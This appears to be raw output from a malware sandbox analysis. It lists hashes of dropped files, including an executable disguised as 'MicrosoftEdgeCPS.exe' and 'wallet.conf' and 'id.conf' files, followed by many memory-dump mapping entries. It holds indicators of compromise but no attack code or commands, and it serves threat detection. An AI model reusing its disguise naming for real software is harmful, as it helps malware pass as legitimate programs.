SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\id.confMD5
bbc740daa580a1dfac2ff712596a2ed7
SHA1c175e73049513f2411e7171661254ece26ed87bd
SHA256d9f782dc1ec18133e96307c02ed70268bf7dc61c99acfec4722e96f7089ab141
SHA512475b11dd5dab095dc362c56328d3aa433f520a6b2b5df328505ab8752e638897a880022308b0e84f75b94eeb1492c68e8a9d4ca539f2c00779b572b3e54e84cc
-
C:\Users\Admin\AppData\Roaming\EdgeCP\wallet.confMD5
69bf7238c8e32793411515d8ca5926a9
SHA1d6918bcceab927a036b760a82cadd340d83b8ed1
SHA25657df56c1be46da0057f1afe0147ac7a700fa4df393bf0b31cabd158939d1cb66
SHA5124a3f787a09c553dd6012d0529644d9b0e7ac672be032eead2d7f9db9a64ce46f315ae01771f893d35160cc597e7df2fab2b600f6b3ff5e97ca8df403699299f3
-
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Local\Temp\sVQTwb6rts5kF2Qe.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
memory/332-97-0x0000000000000000-mapping.dmp
-
memory/432-155-0x0000000000000000-mapping.dmp
-
memory/472-168-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/472-172-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/472-169-0x0000000000413E10-mapping.dmp
-
memory/536-154-0x0000000000000000-mapping.dmp
-
memory/772-72-0x00000000765F1000-0x00000000765F3000-memory.dmpFilesize
8KB
-
memory/772-73-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/772-70-0x0000000000400000-0x00000000007E4000-memory.dmpFilesize
3.9MB
-
memory/772-71-0x00000000007E2730-mapping.dmp
-
memory/828-78-0x0000000000000000-mapping.dmp
-
memory/828-195-0x0000000000000000-mapping.dmp
-
memory/844-84-0x0000000000000000-mapping.dmp
-
memory/1132-160-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/1132-157-0x00000000004466F4-mapping.dmp
-
memory/1132-156-0x0000000000400000-0x000000000047C000-memory.dmpFilesize
496KB
-
memory/1148-104-0x0000000000000000-mapping.dmp
-
memory/1160-196-0x0000000000000000-mapping.dmp
-
memory/1188-118-0x00000000061C0000-0x00000000061C1000-memory.dmpFilesize
4KB
-
memory/1188-148-0x0000000006300000-0x0000000006301000-memory.dmpFilesize
4KB
-
memory/1188-101-0x0000000002480000-0x00000000030CA000-memory.dmpFilesize
12.3MB
-
memory/1188-125-0x0000000006280000-0x0000000006281000-memory.dmpFilesize
4KB
-
memory/1188-105-0x0000000002850000-0x0000000002851000-memory.dmpFilesize
4KB
-
memory/1188-110-0x0000000006040000-0x0000000006041000-memory.dmpFilesize
4KB
-
memory/1188-88-0x0000000000000000-mapping.dmp
-
memory/1188-112-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/1188-132-0x0000000005610000-0x0000000005611000-memory.dmpFilesize
4KB
-
memory/1188-100-0x0000000002480000-0x00000000030CA000-memory.dmpFilesize
12.3MB
-
memory/1188-149-0x0000000006310000-0x0000000006311000-memory.dmpFilesize
4KB
-
memory/1188-116-0x00000000060E0000-0x00000000060E1000-memory.dmpFilesize
4KB
-
memory/1276-166-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1276-161-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1276-162-0x0000000000401074-mapping.dmp
-
memory/1316-191-0x0000000000400000-0x0000000000431000-memory.dmpFilesize
196KB
-
memory/1316-186-0x0000000000401000-mapping.dmp
-
memory/1336-189-0x0000000000000000-mapping.dmp
-
memory/1344-192-0x0000000000000000-mapping.dmp
-
memory/1360-117-0x0000000000000000-mapping.dmp
-
memory/1360-194-0x0000000000000000-mapping.dmp
-
memory/1588-98-0x0000000004790000-0x0000000004791000-memory.dmpFilesize
4KB
-
memory/1588-92-0x00000000047D0000-0x00000000047D1000-memory.dmpFilesize
4KB
-
memory/1588-102-0x0000000002490000-0x0000000002491000-memory.dmpFilesize
4KB
-
memory/1588-99-0x0000000004792000-0x0000000004793000-memory.dmpFilesize
4KB
-
memory/1588-153-0x0000000006040000-0x0000000006041000-memory.dmpFilesize
4KB
-
memory/1588-91-0x0000000000A00000-0x0000000000A01000-memory.dmpFilesize
4KB
-
memory/1588-167-0x00000000061B0000-0x00000000061B1000-memory.dmpFilesize
4KB
-
memory/1588-87-0x0000000000000000-mapping.dmp
-
memory/1640-193-0x0000000000000000-mapping.dmp
-
memory/1684-176-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/1684-174-0x000000000044412E-mapping.dmp
-
memory/1684-107-0x0000000000000000-mapping.dmp
-
memory/1684-173-0x0000000000400000-0x0000000000455000-memory.dmpFilesize
340KB
-
memory/1784-146-0x0000000000000000-mapping.dmp
-
memory/1804-183-0x0000000000400000-0x0000000000405000-memory.dmpFilesize
20KB
-
memory/1804-179-0x00000000004010B8-mapping.dmp
-
memory/1948-184-0x0000000000401108-mapping.dmp
-
memory/1948-190-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/1988-177-0x0000000000401000-mapping.dmp
-
memory/1988-182-0x0000000000400000-0x0000000000413000-memory.dmpFilesize
76KB
-
memory/2004-62-0x0000000000B20000-0x0000000000B21000-memory.dmpFilesize
4KB
-
memory/2004-63-0x0000000000B25000-0x0000000000B36000-memory.dmpFilesize
68KB
-
memory/2004-64-0x0000000005E00000-0x0000000005FA4000-memory.dmpFilesize
1.6MB
-
memory/2004-60-0x0000000000D60000-0x0000000000D61000-memory.dmpFilesize
4KB
-
memory/2004-69-0x0000000000550000-0x00000000005B5000-memory.dmpFilesize
404KB